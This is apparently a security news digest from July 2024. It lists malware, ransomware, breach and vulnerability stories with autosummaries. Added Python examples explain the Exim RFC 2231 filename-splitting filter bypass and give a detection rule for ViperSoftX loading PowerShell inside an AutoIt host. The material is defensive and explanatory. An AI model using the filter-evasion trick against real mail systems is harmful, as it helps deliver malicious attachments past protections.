          Autosummary: Atlantida, modeled on open-source stealers like NecroStealer and PredatorTheStealer, is designed to extract files, screenshots, geolocation, and sensitive data from web browsers and other applications, including Telegram, Steam, FileZilla, and various cryptocurrency wallets.


          CISA Warns of Actively Exploited RCE Flaw in GeoServer GeoTools Software

          exploits
          2024-07-16 https://thehackernews.com/2024/07/cisa-warns-of-actively-exploited-rce.html
          The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Monday added a critical security flaw impacting OSGeo GeoServer GeoTools to its Known Exploited Vulnerabilities (KEV) catalog, based on evidence of active exploitation. GeoServer is an open-source software server written in Java that allows users to share and edit geospatial data. It is the reference implementation of the Open



          CISA adds OSGeo GeoServer GeoTools bug to its Known Exploited Vulnerabilities catalog

          exploits
          2024-07-16 https://securityaffairs.com/165812/security/cisa-adds-osgeo-geoserver-geotools-bug-to-its-known-exploited-vulnerabilities-catalog.html
          U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds an OSGeo GeoServer GeoTools bug to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added an OSGeo GeoServer GeoTools eval injection vulnerability, tracked as CVE-2024-36401 (CVSS score of 9.8), to its Known Exploited Vulnerabilities (KEV) catalog. GeoServer is an open-source server that allows […]

          Autosummary: "


          Kaspersky leaves U.S. market following the ban on the sale of its software in the country

          government
          2024-07-16 https://securityaffairs.com/165799/breaking-news/kaspersky-is-leaving-the-u-s-market.html
          Kaspersky is leaving the U.S. market following the recent ban on the sales of its software imposed by the Commerce Department. Russian cybersecurity firm Kaspersky announced its exit from the U.S. market following the ban on the sale of its software in the country by the Commerce Department. In June, the Biden administration announced it […] "

          Autosummary: TechCrunch reported that the ban will start on July 20; however, the company’s activities, including software updates to its US customers, will be prohibited on September 29. "


          Bolivia discovers huge natural gas field

          latam
          2024-07-16 https://www.bbc.com/news/articles/c25lpxzw9wlo
          The discovery comes at a time when gas exports - one of Bolivia's main sources of revenue - had dwindled. "

          Autosummary: "


          Colombia football head arrested on battery charge

          latam
          2024-07-16 https://www.bbc.com/news/articles/cnk40vjwd27o
          Ramón Jesurún and his son are held on charges of battery after a brawl at Sunday's Copa América final in Miami. "

          Autosummary: "


          Facebook ads for Windows desktop themes push info-stealing malware

          exploits
          2024-07-15 https://www.bleepingcomputer.com/news/security/facebook-ads-for-windows-themes-push-sys01-info-stealing-malware/
          Cybercriminals use Facebook business pages and advertisements to promote fake Windows themes that infect unsuspecting users with the SYS01 password-stealing malware. [...] "

          Autosummary: Trustwave says that the threat actors take out thousands of ads for each campaign, with the top campaigns named blue-softs (8,100 ads), xtaskbar-themes (4,300 ads), newtaskbar-themes (2,200 ads), and awesome-themes-desktop (1,100 ads). The threat actors take out advertisements that promote Windows themes, free game downloads, and software activation cracks for popular applications, like Photoshop, Microsoft Office, and Windows. "


          New BugSleep malware implant deployed in MuddyWater attacks

          exploits
          2024-07-15 https://www.bleepingcomputer.com/news/security/new-bugsleep-malware-implant-deployed-in-muddywater-attacks/
          The Iranian-backed MuddyWater hacking group has partially switched to using a new custom-tailored malware implant to steal files and run commands on compromised systems. [...] "

          Autosummary: Since it surfaced, it has slowly expanded its attacks to cyber-espionage campaigns against government and defense entities in Central and Southwest Asia, as well as organizations from North America, Europe, and Asia [1, 2, 3]. "


          SEXi ransomware rebrands to APT INC, continues VMware ESXi attacks

          exploits ransomware
          2024-07-15 https://www.bleepingcomputer.com/news/security/sexi-ransomware-rebrands-to-apt-inc-continues-vmware-esxi-attacks/
          The SEXi ransomware operation, known for targeting VMware ESXi servers, has rebranded under the name APT INC and has targeted numerous organizations in recent attacks. [...] "

          Autosummary: SEXi ransom note (Source: BleepingComputer). Cybersecurity researcher Will Thomas later found other variants that use the names SOCOTRA, FORMOSA, and LIMPOPO. "


          Kaspersky is shutting down its business in the United States

          government
          2024-07-15 https://www.bleepingcomputer.com/news/security/kaspersky-is-shutting-down-its-business-in-the-united-states/
          Russian cybersecurity company and antivirus software provider Kaspersky Lab will start shutting down operations in the United States on July 20. [...] "

          Autosummary: "


          Singapore Banks to Phase Out OTPs for Online Logins Within 3 Months

          financial
          2024-07-15 https://thehackernews.com/2024/07/singapore-banks-to-phase-out-otps-for.html
          Retail banking institutions in Singapore have three months to phase out the use of one-time passwords (OTPs) for authentication purposes when signing into online accounts to mitigate the risk of phishing attacks. The decision was announced by the Monetary Authority of Singapore (MAS) and the Association of Banks in Singapore (ABS) on July 9, 2024. "Customers who have activated their digital "

          Autosummary: Last month, cybersecurity firm Resecurity noted that cybercriminals are promoting another new phishing kit named V3B on Telegram and the dark web, which is capable of targeting customers of major banks in Ireland, the Netherlands, Finland, Austria, Germany, France, Belgium, Greece, Luxembourg, and Italy. "


          New HardBit Ransomware 4.0 Uses Passphrase Protection to Evade Detection

          exploits ransomware
          2024-07-15 https://thehackernews.com/2024/07/new-hardbit-ransomware-40-uses.html
          Cybersecurity researchers have shed light on a new version of a ransomware strain called HardBit that comes packaged with new obfuscation techniques to deter analysis efforts. "Unlike previous versions, HardBit Ransomware group enhanced the version 4.0 with passphrase protection," Cybereason researchers Kotaro Ogino and Koshi Oyama said in an analysis. "The passphrase needs to be provided during "

          Autosummary: Ransomware activity continues to "remain on an upward trend" in 2024, with ransomware actors claiming 962 attacks in the first quarter of 2024, up from 886 attacks reported year-over-year. "


          Hello, is it me you’re looking for? How scammers get your phone number

          financial
          2024-07-15 https://www.welivesecurity.com/en/scams/hello-is-it-me-youre-looking-for-how-scammers-get-your-phone-number/
          Your humble phone number is more valuable than you may think. Here’s how it could fall into the wrong hands – and how you can help keep it out of the reach of fraudsters. "

          Autosummary: Tracking, data brokers, and leaks: data brokers vacuum up your personal information from publicly available sources (government licenses/registrations), commercial sources (business partners like credit card providers or stores) as well as by tracking your online activities (activities on social media, ad clicks, etc.), before selling your information to others. Looking for victims: naturally, the more companies, sites, and apps you share your personal information with, the more detailed your personal “marketing profile” is. These scams often involve pig butchering, cryptocurrency schemes, romance scams, and tech support fraud, each of which spins a compelling yarn and preys on some of what actually makes us human. Stolen accounts: various online services require your phone number, be it to confirm your identity, to place an order, or to serve as an authentication factor; where possible, rely on dedicated security keys, apps, or biometrics instead of SMS-based verification. "


          Banks in Singapore to phase out one-time passwords in 3 months

          financial
          2024-07-14 https://www.bleepingcomputer.com/news/security/banks-in-singapore-to-phase-out-one-time-passwords-in-3-months/
          The Monetary Authority of Singapore (MAS) has announced a new requirement impacting all major retail banks in the country to phase out the use of one-time passwords (OTPs) within the next three months. [...] "

          Autosummary: "


          Is Brazil's Brics-building worth it?

          latam industry
          2024-07-14 https://www.bbc.com/news/articles/c0venrydg8yo
          The Brazilian president sees the Brics as a way to remake the world - but it is dominated by China. "

          Autosummary: By Robert Plummer, BBC News. Lula's Brazil is keen to promote the Brics, but it is dwarfed by Xi Jinping's China (image caption). It's been more than a year-and-a-half since Brazil's Luiz Inácio Lula da Silva returned to the country's presidency, back from the political dead after his conviction on corruption charges was dramatically annulled. In that time, President Lula's comeback has given renewed force to one of the world's most unlikely economic alliances - the Brics, a grouping that unites Brazil with Russia, India, China and South Africa. Rodrigo Zeidan, a Brazilian economist based at China's New York University Shanghai, tells the BBC that Brazil and China alike see the Brics as a "hedge" in terms of global alliances, rather than as a top priority. "


          Hackers use PoC exploits in attacks 22 minutes after release

          exploits
          2024-07-13 https://www.bleepingcomputer.com/news/security/hackers-use-poc-exploits-in-attacks-22-minutes-after-release/
          Threat actors are quick to weaponize available proof-of-concept (PoC) exploits in actual attacks, sometimes as quickly as 22 minutes after exploits are made publicly available. [...] "

          Autosummary: During the examined period, the most targeted flaws were CVE-2023-50164 and CVE-2022-33891 in Apache products, CVE-2023-29298, CVE-2023-38203 and CVE-2023-26360 in ColdFusion, and CVE-2023-35082 in MobileIron. "


          Microsoft fixes bug causing Windows Update automation issues

          exploits
          2024-07-13 https://www.bleepingcomputer.com/news/microsoft/microsoft-fixes-bug-causing-windows-update-automation-issues/
          Microsoft has resolved a known issue introduced by the June 2024 KB5039302 preview update that caused problems when using Windows Update automation scripts on Windows 11 systems. [...] "

          Autosummary: "After installing the June 2024 Windows preview update, released June 25, 2024 (KB5039302) and later updates, you might face issues using Windows Update Agent API (WUA) from your script (PowerShell, VBScript, etc.) "


          AT&T Confirms Data Breach Affecting Nearly All Wireless Customers

          financial
          2024-07-13 https://thehackernews.com/2024/07/at-confirms-data-breach-affecting.html
          American telecom service provider AT&T has confirmed that threat actors managed to access data belonging to "nearly all" of its wireless customers as well as customers of mobile virtual network operators (MVNOs) using AT&T's wireless network. "Threat actors unlawfully accessed an AT&T workspace on a third-party cloud platform and, between April 14 and April 25, 2024, exfiltrated "

          Autosummary: AT&T's list of MVNOs includes Black Wireless, Boost Infinite, Consumer Cellular, Cricket Wireless, FreedomPop, FreeUp Mobile, Good2Go, H2O Wireless, PureTalk, Red Pocket, Straight Talk Wireless, TracFone Wireless, Unreal Mobile, and Wing. "


          Massive AT&T data breach exposes call logs of 109 million customers

          financial
          2024-07-12 https://www.bleepingcomputer.com/news/security/massive-atandt-data-breach-exposes-call-logs-of-109-million-customers/
          AT&T is warning of a massive data breach where threat actors stole the call logs for approximately 109 million customers, or nearly all of its mobile customers, from an online database on the company's Snowflake account. [...] "

          Autosummary: The list of high-profile victims to which AT&T is being added now includes Advance Auto Parts, Pure Storage, Los Angeles Unified, Neiman Marcus, Ticketmaster, and Banco Santander. "


          “Nearly all” AT&T customers had phone records stolen in new data breach disclosure

          financial
          2024-07-12 https://www.malwarebytes.com/blog/news/2024/07/nearly-all-att-customers-had-phone-records-stolen-in-new-data-breach-disclosure
          AT&T has told customers about yet another data breach. This time call and text records of nearly all customers were stolen. "

          Autosummary: In a déjà-vu nightmare, US phone giant AT&T has notified customers that cybercriminals managed to download phone call and text message records of “nearly all of AT&T cellular customers from May 1, 2022 to October 31, 2022 as well as on January 2, 2023”. In a filing with the Securities and Exchange Commission (SEC), AT&T said: “On April 19, 2024, AT&T Inc. (“AT&T”) learned that a threat actor claimed to have unlawfully accessed and copied AT&T call logs.” Phishing attacks often impersonate people or brands you know, and use themes that require urgent attention, such as missed deliveries, account suspensions, and security alerts. "


          Rite Aid confirms data breach after June ransomware attack

          financial exploits ransomware
          2024-07-12 https://www.bleepingcomputer.com/news/security/rite-aid-confirms-data-breach-after-june-ransomware-attack/
          Pharmacy giant Rite Aid confirmed a data breach after suffering a cyberattack in June, which was claimed by the RansomHub ransomware operation. [...] "

          Autosummary: "In the meantime, we can confirm that no social security numbers, financial information, or patient information were impacted by this incident," the company added. "


          Dangerous monitoring tool mSpy suffers data breach, exposes customer details

          financial
          2024-07-12 https://www.malwarebytes.com/blog/news/2024/07/dangerous-monitoring-tool-mspy-suffers-data-breach-exposes-customer-details
          Customers of the stalkerware application mSpy had their customer support details exposed after a data breach "

          Autosummary: Parental monitoring apps present their own complications—particularly when they’re used non-consensually against children—as they can give parents a near-omniscient, unfiltered view into their children’s lives, granting them access to text messages, shared photos, web browsing activity, locations visited, and call logs. "


          Critical Exim bug bypasses security filters on 1.5 million mail servers

          exploits
          2024-07-12 https://www.bleepingcomputer.com/news/security/critical-exim-bug-bypasses-security-filters-on-15-million-mail-servers/
          Censys warns that over 1.5 million Exim mail transfer agent (MTA) instances are unpatched against a critical vulnerability that lets threat actors bypass security filters. [...] "

          Autosummary: "As of July 10, 2024, Censys observes 1,567,109 publicly exposed Exim servers running a potentially vulnerable version (4.97.1 or earlier), concentrated mostly in the United States, Russia, and Canada," the company added. "


          RansomHub ransomware – what you need to know

          exploits ransomware
          2024-07-12 https://www.tripwire.com/state-of-security/ransomhub-ransomware-what-you-need-know
          Despite first appearing earlier this year, RansomHub is already considered one of the most prolific ransomware groups in existence. Read more in my article on the Tripwire State of Security blog. "

          Autosummary: On its website, in its "About" section, RansomHub says that it does not allow attacks on "CIS, Cuba, North Korea, and China." It operates a ransomware-as-a-service (RaaS) operation, meaning that a central core of the group creates and maintains the ransomware code and infrastructure, and rents it out to other cybercriminals who act as affiliates. So, making life harder for LockBit didn't get rid of the ransomware problem... ...it just drove it elsewhere, yes. "


          DarkGate Malware Exploits Samba File Shares in Short-Lived Campaign

          exploits
          2024-07-12 https://thehackernews.com/2024/07/darkgate-malware-exploits-samba-file.html
          Cybersecurity researchers have shed light on a short-lived DarkGate malware campaign that leveraged Samba file shares to initiate the infections. Palo Alto Networks Unit 42 said the activity spanned the months of March and April 2024, with the infection chains using servers running public-facing Samba file shares hosting Visual Basic Script (VBS) and JavaScript files. Targets included North "

          Autosummary: "This was a relatively short-lived campaign that illustrates how threat actors can creatively abuse legitimate tools and services to distribute their malware," security researchers Vishwa Thothathri, Yijie Sui, Anmol Maurya, Uday Pratap Singh, and Brad Duncan said. "


          Ever Wonder How Hackers Really Steal Passwords? Discover Their Tactics in This Webinar

          industry
          2024-07-12 https://thehackernews.com/2024/07/ever-wonder-how-hackers-really-steal.html
          In today's digital age, passwords serve as the keys to our most sensitive information, from social media accounts to banking and business systems. This immense power brings with it significant responsibility—and vulnerability. Most people don't realize their credentials have been compromised until the damage is done. Imagine waking up to drained bank accounts, stolen identities, or a company's "

          Autosummary: What You'll Learn: In this webinar, Tim Chase will delve into the world of compromised credentials, covering: The Anatomy of an Attack: Understand how attackers steal and exploit credentials through phishing and brute force. "


          Critical Exim Mail Server Vulnerability Exposes Millions to Malicious Attachments

          exploits
          2024-07-12 https://thehackernews.com/2024/07/critical-exim-mail-server-vulnerability.html
          A critical security issue has been disclosed in the Exim mail transfer agent that could enable threat actors to deliver malicious attachments to target users" inboxes. The vulnerability, tracked as CVE-2024-39929, has a CVSS score of 9.1 out of 10.0. It has been addressed in version 4.98. "Exim through 4.97.1 misparses a multiline RFC 2231 header filename, and thus remote attackers can bypass "

          Autosummary: "
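The Exim advisory above, like the Censys item on the same CVE-2024-39929 earlier on this page, turns on a single parsing detail: RFC 2231 allows a MIME parameter such as an attachment filename to be split across continuation parameters (filename*0, filename*1, and so on), so a filter that looks at one header line sees only a fragment of the name. The following Python is an added illustration written for this page, not Exim's code and not a reproduction of the bug: it contrasts a hypothetical single-line filename check with the standard-library MIME parser, which reassembles the continuations, on a constructed message. The message, the block list and the function names are assumptions for the example.

```python
import email
import re
from typing import Optional

# Constructed message (not from the article): the attachment name is sent as
# two RFC 2231 continuation parameters, filename*0 and filename*1, so the
# ".exe" extension only exists once the pieces are joined.
SAMPLE_MESSAGE = """\
From: sender@example.test
To: victim@example.test
Subject: invoice
MIME-Version: 1.0
Content-Type: application/octet-stream
Content-Disposition: attachment;
 filename*0="invoice";
 filename*1=".exe"

MZ...
"""

# Extensions a hypothetical attachment filter refuses.
BLOCKED_EXTENSIONS = {".exe", ".scr", ".bat", ".com", ".vbs", ".js"}

# A filter of the kind the Exim bug resembles: one regex over one header line.
_SINGLE_LINE_FILENAME = re.compile(r'filename(?:\*0)?="([^"]*)"')


def naive_filename(raw_message: str) -> Optional[str]:
    """Return the first filename fragment found on any single header line.

    This never reassembles RFC 2231 continuations, so a name split across
    filename*0 / filename*1 is only ever seen in part.
    """
    headers = raw_message.split("\n\n", 1)[0]
    for line in headers.splitlines():
        match = _SINGLE_LINE_FILENAME.search(line)
        if match:
            return match.group(1)
    return None


def parsed_filename(raw_message: str) -> Optional[str]:
    """Return the filename as the stdlib MIME parser reassembles it.

    email.message.Message.get_filename() joins filename*N continuation
    parameters (and decodes the charset'language'value form) before returning.
    """
    msg = email.message_from_string(raw_message)
    return msg.get_filename()


def extension_blocked(filename: Optional[str]) -> bool:
    """Apply the block list to whatever name the filter managed to extract."""
    if not filename:
        return False
    dot = filename.rfind(".")
    return dot != -1 and filename[dot:].lower() in BLOCKED_EXTENSIONS


if __name__ == "__main__":
    for label, extract in (("single-line filter", naive_filename),
                           ("RFC 2231 parse", parsed_filename)):
        name = extract(SAMPLE_MESSAGE)
        print(f"{label:18s} -> {name!r} blocked={extension_blocked(name)}")
```

Run stand-alone, the single-line filter reports the name as "invoice" and lets the attachment through, while the RFC 2231 aware parse reports "invoice.exe" and blocks it. The practical rule is to take the filename from a full MIME parse of the whole header, never from a regex over raw header lines, and to re-test any extension filter with continuation, percent-encoded and mixed-case variants of the name.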


          U.S. Seizes Domains Used by AI-Powered Russian Bot Farm for Disinformation

          rusia-ucrania
          2024-07-12 https://thehackernews.com/2024/07/us-seizes-domains-used-by-ai-powered.html
          The U.S. Department of Justice (DoJ) said it seized two internet domains and searched nearly 1,000 social media accounts that Russian threat actors allegedly used to covertly spread pro-Kremlin disinformation in the country and abroad on a large scale. "The social media bot farm used elements of AI to create fictitious social media profiles — often purporting to belong to individuals in the "

          Autosummary: At the heart of the operation is a network of bulletproof hosting providers encompassing Aeza, Evil Empire, GIR, and TNSECURITY, which have also harbored command-and-control domains for different malware families like Stealc, Amadey, Agent Tesla, Glupteba, Raccoon Stealer, RisePro, RedLine Stealer, RevengeRAT, Lumma, Meduza, and Mystic. "Using this tool, RT affiliates disseminated disinformation to and about a number of countries, including the United States, Poland, Germany, the Netherlands, Spain, Ukraine, and Israel," law enforcement agencies from Canada, the Netherlands, and the U.S. said. "


          Should ransomware payments be banned? – Week in security with Tony Anscombe

          exploits ransomware
          2024-07-12 https://www.welivesecurity.com/en/videos/should-ransomware-payments-be-banned-week-security-tony-anscombe/
          Blanket bans on ransomware payments are a much-debated topic in cybersecurity and policy circles. What are the implications of outlawing the payments, and would the ban be effective? "

          Autosummary: "


          Advance Auto Parts data breach impacts 2.3 million people

          financial
          2024-07-11 https://www.bleepingcomputer.com/news/security/advance-auto-parts-data-breach-impacts-23-million-people/
          Advance Auto Parts is sending data breach notifications to over 2.3 million people whose personal data was stolen in recent Snowflake data theft attacks. [...] "

          Autosummary: On June 5, 2024, a threat actor known as "Sp1d3r" began selling a massive 3TB database allegedly containing 380 million Advance customer records, orders, transaction details, and other sensitive information. "


          Google increases bug bounty rewards five times, up to $151K

          exploits
          2024-07-11 https://www.bleepingcomputer.com/news/security/google-increases-bug-bounty-rewards-five-times-up-to-151k/
          Google has announced a fivefold increase in payouts for bugs found in its systems and applications reported through its Vulnerability Reward Program, with a new maximum bounty of $151,515 for a single security flaw. [...] "

          Autosummary: "


          Dallas County: Data of 200,000 exposed in 2023 ransomware attack

          exploits government ransomware
          2024-07-11 https://www.bleepingcomputer.com/news/security/dallas-county-data-of-200-000-exposed-in-2023-ransomware-attack/
          Dallas County is notifying over 200,000 people that the Play ransomware attack, which occurred in October 2023, exposed their personal data to cybercriminals. [...] "

          Autosummary: "


          ARRL finally confirms ransomware gang stole data in cyberattack

          exploits ransomware ciber
          2024-07-11 https://www.bleepingcomputer.com/news/security/arrl-finally-confirms-ransomware-gang-stole-data-in-cyberattack/
          The American Radio Relay League (ARRL) finally confirmed that some of its employees' data was stolen in a May ransomware attack initially described as a "serious incident." [...] "

          Autosummary: "


          Chinese APT41 Upgrades Malware Arsenal with DodgeBox and MoonWalk

          exploits
          2024-07-11 https://thehackernews.com/2024/07/chinese-apt41-upgrades-malware-arsenal.html
          The China-linked advanced persistent threat (APT) group codenamed APT41 is suspected to be using an "advanced and upgraded version" of a known malware called StealthVector to deliver a previously undocumented backdoor dubbed MoonWalk. The new variant of StealthVector – which is also referred to as DUSTPAN – has been designated DodgeBox by Zscaler ThreatLabz, which discovered the loader strain in "

          Autosummary: It's also tracked by the broader cybersecurity community under the names Axiom, Blackfly, Brass Typhoon (formerly Barium), Bronze Atlas, Earth Baku, HOODOO, Red Kelpie, TA415, Wicked Panda, and Winnti. "


          New Poco RAT Targets Spanish-Speaking Victims in Phishing Campaign

          financial
          2024-07-11 https://thehackernews.com/2024/07/new-poco-rat-targets-spanish-speaking.html
          Spanish-speaking victims are the target of an email phishing campaign that has delivered a new remote access trojan (RAT) called Poco RAT since at least February 2024. The attacks primarily single out the mining, manufacturing, hospitality, and utilities sectors, according to cybersecurity company Cofense. "The majority of the custom code in the malware appears to be focused on anti-analysis, "

          Autosummary: "The majority of the custom code in the malware appears to be focused on anti-analysis, communicating with its command-and-control center (C2), and downloading and running files with a limited focus on monitoring or harvesting credentials," it said. "


          PHP Vulnerability Exploited to Spread Malware and Launch DDoS Attacks

          exploits
          2024-07-11 https://thehackernews.com/2024/07/php-vulnerability-exploited-to-spread.html
          Multiple threat actors have been observed exploiting a recently disclosed security flaw in PHP to deliver remote access trojans, cryptocurrency miners, and distributed denial-of-service (DDoS) botnets. The vulnerability in question is CVE-2024-4577 (CVSS score: 9.8), which allows an attacker to remotely execute malicious commands on Windows systems using Chinese and Japanese language locales. It "

          Autosummary: The most attacked country during the time period was China, followed by Turkey, Singapore, Hong Kong, Russia, Brazil, Thailand, Canada, Taiwan, and Kyrgyzstan. "


          Why both businesses and scammers love India's payment system

          financial
          2024-07-11 https://www.bbc.com/news/articles/c288m1km01po
          Fast and free, India's UPI payments system has been a big success, but has attracted scammers. "

          Autosummary: Retailers in Bhutan, Mauritius, Nepal, Singapore, Sri Lanka and UAE will take UPI payments. “While digital payments are convenient, they do come with vulnerabilities," says Shashank Shekhar, founder of the Delhi-based Future Crime Research Foundation. "There's the fear of being robbed or, as I am not a licensed vendor, the local body can come and dismantle my store anytime," he says. "


          Windows MSHTML zero-day used in malware attacks for over a year

          exploits
          2024-07-10 https://www.bleepingcomputer.com/news/security/windows-mshtml-zero-day-used-in-malware-attacks-for-over-a-year/
          Microsoft fixed a Windows zero-day vulnerability that has been actively exploited in attacks for eighteen months to launch malicious scripts while bypassing built-in security features. [...] "

          Autosummary: Once executed, the malware will steal all credentials stored in the browser, cookies, browser history, cryptocurrency wallets, Steam credentials, and other sensitive data. "


          Microsoft fixes Windows 11 bug causing reboot loops, taskbar freezes

          exploits
          2024-07-10 https://www.bleepingcomputer.com/news/microsoft/microsoft-fixes-windows-11-bug-causing-reboot-loops-taskbar-freezes/
          Microsoft has fixed a known issue causing restart loops and taskbar problems on Windows 11 systems after installing the June KB5039302 preview update. [...] "

          Autosummary: "


          Ticket Heist fraud gang uses 700 domains to sell fake Olympics tickets

          industry
          2024-07-10 https://www.bleepingcomputer.com/news/security/ticket-heist-fraud-gang-uses-700-domains-to-sell-fake-olympics-tickets/
          A large-scale fraud campaign with over 700 domain names is likely targeting Russian-speaking users looking to purchase tickets for the Summer Olympics in Paris. [...] "

          Autosummary: Ticket Heist website for the UEFA EURO 24 Championship (Source: QuoIntelligence). Additionally, the researchers discovered websites in this fraudulent activity that claimed to sell tickets to music concerts featuring famous bands like Twenty One Pilots, Iron Maiden, Metallica, Rammstein, and musicians (Bruno Mars, Ludovico Einaudi). “For example, a random event and seat location on the official website could cost less than EUR 100, whereas the same tickets and locations on the fraudulent websites were priced at a minimum of EUR 300, often reaching EUR 1,000” - QuoIntelligence. QuoIntelligence threat researcher Andrei Moldovan told BleepingComputer that while there is no confirmation, the higher prices could be part of a trick to make victims believe they get “premium treatment” for the extra money since the tickets are not available through the official distribution channels. "


          GitLab: Critical bug lets attackers run pipelines as other users

          exploits
          2024-07-10 https://www.bleepingcomputer.com/news/security/gitlab-warns-of-critical-bug-that-lets-attackers-run-pipelines-as-an-arbitrary-user/
          GitLab warned today that a critical vulnerability in its product's GitLab Community and Enterprise editions allows attackers to run pipeline jobs as any other user. [...] "

          Autosummary: The GitLab DevSecOps platform has over 30 million registered users and is used by over 50% of Fortune 100 companies, including T-Mobile, Goldman Sachs, Airbus, Lockheed Martin, Nvidia, and UBS. "


          ViperSoftX malware covertly runs PowerShell using AutoIT scripting

          exploits
          2024-07-10 https://www.bleepingcomputer.com/news/security/vipersoftx-malware-covertly-runs-powershell-using-autoit-scripting/
          The latest variants of the ViperSoftX info-stealing malware use the common language runtime (CLR) to load and execute PowerShell commands within AutoIt scripts to evade detection. [...] "

          Autosummary: Scheduled tasks added by ViperSoftX (Source: Trellix). Stealthy operation: by using CLR to load and execute PowerShell commands within the AutoIt environment, ViperSoftX seeks to blend into legitimate activities on the system and evade detection. "


          New Ransomware Group Exploiting Veeam Backup Software Vulnerability

          exploits ransomware
          2024-07-10 https://thehackernews.com/2024/07/new-ransomware-group-exploiting-veeam.html
          A now-patched security flaw in Veeam Backup & Replication software is being exploited by a nascent ransomware operation known as EstateRansomware. Singapore-headquartered Group-IB, which discovered the threat actor in early April 2024, said the modus operandi involved the exploitation of CVE-2023-27532 (CVSS score: 7.5) to carry out the malicious activities. Initial access to the target "

          Autosummary: Group-IB said it observed the actor exploiting Veeam flaw CVE-2023-27532 with an aim to enable xp_cmdshell on the backup server and create a rogue user account named "VeeamBkp," alongside conducting network discovery, enumeration, and credential harvesting activities using tools like NetScan, AdFind, and NitSoft via the newly created account. "


          Microsoft"s July Update Patches 143 Flaws, Including Two Actively Exploited

          exploits
          2024-07-10 https://thehackernews.com/2024/07/microsofts-july-update-patches-143.html
          Microsoft has released patches to address a total of 143 security flaws as part of its monthly security updates, two of which have come under active exploitation in the wild. Five out of the 143 flaws are rated Critical, 136 are rated Important, and four are rated Moderate in severity. The fixes are in addition to 33 vulnerabilities that have been addressed in the Chromium-based Edge browser "

          Autosummary: Rounding off the long list of patches is CVE-2024-38021 (CVSS score: 8.8), a remote code execution flaw in Microsoft Office that, if successfully exploited, could permit an attacker to gain high privileges, including read, write, and delete functionality. The two security shortcomings that have come under exploitation are: CVE-2024-38080 (CVSS score: 7.8), a Windows Hyper-V elevation of privilege vulnerability, and CVE-2024-38112 (CVSS score: 7.5) - "


          ViperSoftX Malware Disguises as eBooks on Torrents to Spread Stealthy Attacks

          exploits
          2024-07-10 https://thehackernews.com/2024/07/vipersoftx-malware-disguises-as-ebooks.html
          The sophisticated malware known as ViperSoftX has been observed being distributed as eBooks over torrents. "A notable aspect of the current variant of ViperSoftX is that it uses the Common Language Runtime (CLR) to dynamically load and run PowerShell commands, thereby creating a PowerShell environment within AutoIt for operations," Trellix security researchers Mathanraj Thangaraju and Sijo Jacob "

          Autosummary: Executing the shortcut file initiates a multi-stage infection sequence that begins with the extraction of PowerShell code that unhides the concealed folder and sets up persistence on the system to launch an AutoIt script that, in turn, interacts with the .NET CLR framework, to decrypt and run a secondary PowerShell script, which is ViperSoftX. "AutoIt does not by default support the .NET "
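Both ViperSoftX items above (the BleepingComputer piece and this one) describe the same hosting trick: an AutoIt script brings up the .NET Common Language Runtime and runs PowerShell inside it, so the PowerShell engine ends up loaded into a process that is not powershell.exe. That gives a defender a module-load signal to hunt for. The Python below is an added example for this page, not Trellix's detection logic: it scans constructed Sysmon-style image-load records (Event ID 7, which carries the loading process in Image and the loaded module in ImageLoaded) for the PowerShell engine assembly, System.Management.Automation.dll, loaded by a host other than the PowerShell executables, and for an AutoIt interpreter loading the CLR at all. The record format, the file paths and the process names are assumptions made for the example.

```python
import ntpath
import re
from typing import Dict, List

# Constructed Sysmon-style records (EventID=7 is ImageLoad). These lines are
# made up for the example and are not telemetry from the Trellix report.
SAMPLE_EVENTS = [
    "EventID=7 Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "
    "ImageLoaded=C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\clr.dll",
    "EventID=7 Image=C:\\Users\\alice\\AppData\\Roaming\\Reader\\AutoIt3.exe "
    "ImageLoaded=C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\clr.dll",
    "EventID=7 Image=C:\\Users\\alice\\AppData\\Roaming\\Reader\\AutoIt3.exe "
    "ImageLoaded=C:\\Windows\\Microsoft.NET\\assembly\\GAC_MSIL\\System.Management.Automation"
    "\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll",
    "EventID=7 Image=C:\\Program Files\\Contoso\\Agent.exe ImageLoaded=C:\\Windows\\System32\\ntdll.dll",
    "EventID=1 Image=C:\\Users\\alice\\AppData\\Roaming\\Reader\\AutoIt3.exe CommandLine=AutoIt3.exe update.au3",
]

# key=value pairs; values may contain spaces, so stop before the next "key=".
KV_PATTERN = re.compile(r"(\w+)=(.*?)(?=\s+\w+=|$)")

# Processes that legitimately host the PowerShell engine (assumed allow-list).
POWERSHELL_HOSTS = {"powershell.exe", "pwsh.exe", "powershell_ise.exe"}
# .NET runtime images. AutoIt has no built-in .NET support, so an AutoIt
# interpreter pulling these in is worth a look on its own.
CLR_IMAGES = {"clr.dll", "coreclr.dll", "mscoree.dll"}
POWERSHELL_ENGINE = "system.management.automation.dll"


def parse_event(line: str) -> Dict[str, str]:
    """Turn one 'key=value key=value' record into a dict."""
    return {key: value for key, value in KV_PATTERN.findall(line)}


def find_suspicious_clr_hosting(lines: List[str]) -> List[Dict[str, str]]:
    """Return one finding per image-load record that matches either rule."""
    findings = []
    for line in lines:
        event = parse_event(line)
        if event.get("EventID") != "7":
            continue  # only image-load records carry the loaded module
        host = ntpath.basename(event.get("Image", "")).lower()
        module = ntpath.basename(event.get("ImageLoaded", "")).lower()
        if module == POWERSHELL_ENGINE and host not in POWERSHELL_HOSTS:
            # Rule 1: the PowerShell engine inside a non-PowerShell process.
            findings.append({"process": event["Image"], "module": event["ImageLoaded"],
                             "reason": "powershell-engine-in-unexpected-host"})
        elif host.startswith("autoit") and module in CLR_IMAGES:
            # Rule 2: an AutoIt interpreter bringing up the CLR at all.
            findings.append({"process": event["Image"], "module": event["ImageLoaded"],
                             "reason": "autoit-interpreter-loaded-clr"})
    return findings


if __name__ == "__main__":
    for finding in find_suspicious_clr_hosting(SAMPLE_EVENTS):
        print(f"{finding['reason']:40s} {finding['process']} -> {finding['module']}")
```

A renamed AutoIt interpreter defeats the second rule but not the first, which keys on the loaded assembly rather than the host's file name; before alerting on the first rule in production, allow-list the hosts that legitimately embed PowerShell in your environment (management agents, IDEs, custom .NET tools), since the engine assembly itself is not malicious.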


          New OpenSSH Vulnerability Discovered: Potential Remote Code Execution Risk

          exploits
